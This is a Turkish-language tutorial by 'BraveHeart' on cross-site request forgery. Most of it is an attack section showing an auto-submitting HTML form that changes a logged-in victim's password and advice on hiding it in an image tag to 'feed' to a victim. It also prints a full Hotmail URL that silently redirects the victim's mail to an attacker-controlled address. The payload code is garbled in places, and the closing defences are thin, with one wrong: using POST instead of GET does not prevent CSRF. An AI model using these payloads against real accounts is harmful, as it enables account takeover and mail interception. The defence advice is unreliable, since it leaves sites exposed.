XSRF - CSRF

hazirlayan: BraveHeart

XSRF - CSRF (Cross-Site Request Forgery)

XSRF – CSRF günümüzün en yaygin ve en kullanisli Web App. Security açigidir.XSRF- CSRF Içinde XSS Bulunduran ve XSS alaninda görülen bir güvenlik açigidir. Kullanici parametresi kullanarak güven saglamis gibi tehlike arz etmektedir.Bu uygulama ile “Banka Sifreleri, Para transfer uygulamalari,Mail Sifreleri …” gibi bir çok legal kullanimlar tehlike altindadir.

XSRF kullanim saldirganlari kullanicinin kayitli bilgilerini kendi ellerindeki bir istemci tarafindan kullaniciya tiklattirarak degistirebilirler.Bu durumda kullanici Online yani giris yapmis olmalidir.XSS kullanici bilgilerini kendi tarafina javascript kodlariyla çekmek amaçlidir fakat XSRF kullanicinin bilgileri kendi tarafindan degistirmek amaçlidir.Gönderilen tek bir link ile bunu saglamak mümkündür.

XSRF Exploiting:

XSRF ile saldiri yapabilmek için saldirganin yardimci bir sistem kullanmasi gerekmektedir.Bu yardimci sistem kullanilan ve bilgilerin alinmasi için gerekli Web sayfasi olabilir.Saldirgan web sayfasindaki XSRF açigi olusturan alani kendine göre düzenleyip size farkli bir link ile sunabilir bilgilerinizi degistirip kendi giris yapabilir.

site.com/password.php

Kullanici üstteki linkte giris yaptigi alanda sifrelerini degistirebilir olsun.

site.com/password.php?pass=bugres

Sifre degisiminden sonra linkteki gibi bir URL uygulamasi görüntüleniyor.

Böyle bir uygulama içerisinde Post ve Get Metotlari kullanarak kullanicinin sifreleri sadece bir link ile degistirilebilir.

<b0dy onLoad="Submit();">
<script>function Submit[]{document.BraveHeart.submit();}</script>

<form action=”/password.php” method="post">

<input type="text" name="password" />
<input class="button" type="submit" name="submit" value="Onay" />

Sayfa içerisindeki kodlamaya göre böyle bir kodlamayi HTML yaparak veya <img> içerisinde yolladiginiz bir linkte saklayarak kurbana yedirmeniz dogrultusunda sifre degisecektir.XSRF uygulamalari sadece kodlama ile degil URL üzerinde de etkilemektedir.

Link uygulamasina Hotmail’den Bir Örnek:

http://mail.live.com/mail/options.aspx?subsection=32&n=1%3f&POSTDATA=__eventTARGET%3dctl03%24SaveButton&__eventARGUMENT=&__VIEWSTATE=%2fwEPDwULLTEyMzQwMzk2ODcPZBYCAggPZBYCZg9kFgJmD2QWCAICDxYCHgRyb3dzBQEyZAIEDxYCHgV2YWx1ZQUYRGFoYSBlLXBvc3RhIGFkcmVzaSBla2xlZAIFDxYCHwEFBktheWRldGQCBg8WAh8BBQbEsHB0YWxkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBQ5jdGwwMyRSYWRpb09mZgUNY3RsMDMkUmFkaW9PbgUWY3RsMDMkS2VlcENvcHlDaGVja0JveOf%2bwlzIUyqbG5oP%2frmccAiY3eIj&mt=01.01_fd752da49866db5e6ed49192959bdcd540e8aae72b1187d212f9145b8b030f8e%7c9cac52df51db4610&ctl03$ForwardingToggle=2&ctl03$AddressTextBox=cwbraveheart%40windowslive.com&__eventVALIDATIon=%2fwEWBwLsj7HaDgLJ2PzyCgLI2PzyCgLb2%2fSaAwLTwd6HCQKuroqgBQKC1cmJB3uYq%2bbIhRlaUP23tLA1MirEOOcN&wa=wsignin1.0

Bu Örnekte URL Kriptolama Ile Hotmail Üzerinden “Postalarinizi Baska Maile Gönderin” Bölümüne yazdirma yapabiliyoruz.Yalniz Hotmail Mail Oturumunuz Açik Olmasi Gerekmektedir.

XSRF Korunma Yöntemleri:

· GET Metot’u yerine POST Metot’u kullanabilirsiniz.

· Kullanici Parametresi veya Özel Bir sunucu isteyerek engelleyebilirsiniz.

· Istemci yönlendirmesi kullanabilirsiniz.

Bug Researchers - BraveHeart

...